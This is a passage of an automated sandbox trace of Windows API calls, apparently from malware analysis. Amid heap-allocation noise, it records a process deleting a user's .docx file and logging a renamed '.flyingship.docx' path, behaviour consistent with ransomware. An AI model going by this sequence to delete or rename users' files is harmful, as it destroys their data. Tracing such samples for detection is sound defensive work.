Size=0x8) returned 0x9c2618 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0175.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.440] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.441] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nqzsz9xcqqe d7p.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0175.443] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.443] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.443] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0175.443] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.443] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.445] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.445] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0175.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.445] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.448] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.448] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.448] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.448] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpFilePart=0x0) returned 0x3c [0175.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdecce80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 0x90ae18 [0175.449] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nqzsz9xcqqe d7p.docx")) returned 1 [0175.452] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdecce80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 0 [0175.452] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0175.452] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.453] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.454] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.454] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.454] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.454] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.454] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.454] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.454] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.455] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.455] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0175.455] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.455] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa5f008 [0175.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.456] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0175.457] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x144a, lpOverlapped=0x0) returned 1 [0175.457] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0175.457] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x144a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.457] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0175.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x923ad0 [0175.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\n", cchWideChar=74, lpMultiByteStr=0x923ad0, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 74 [0175.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0175.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0175.458] WriteFile (in: hFile=0x138, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x49, lpOverlapped=0x0) returned 1 [0175.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0175.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.458] CloseHandle (hObject=0x138) returned 1 [0175.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0175.462] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0175.462] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | 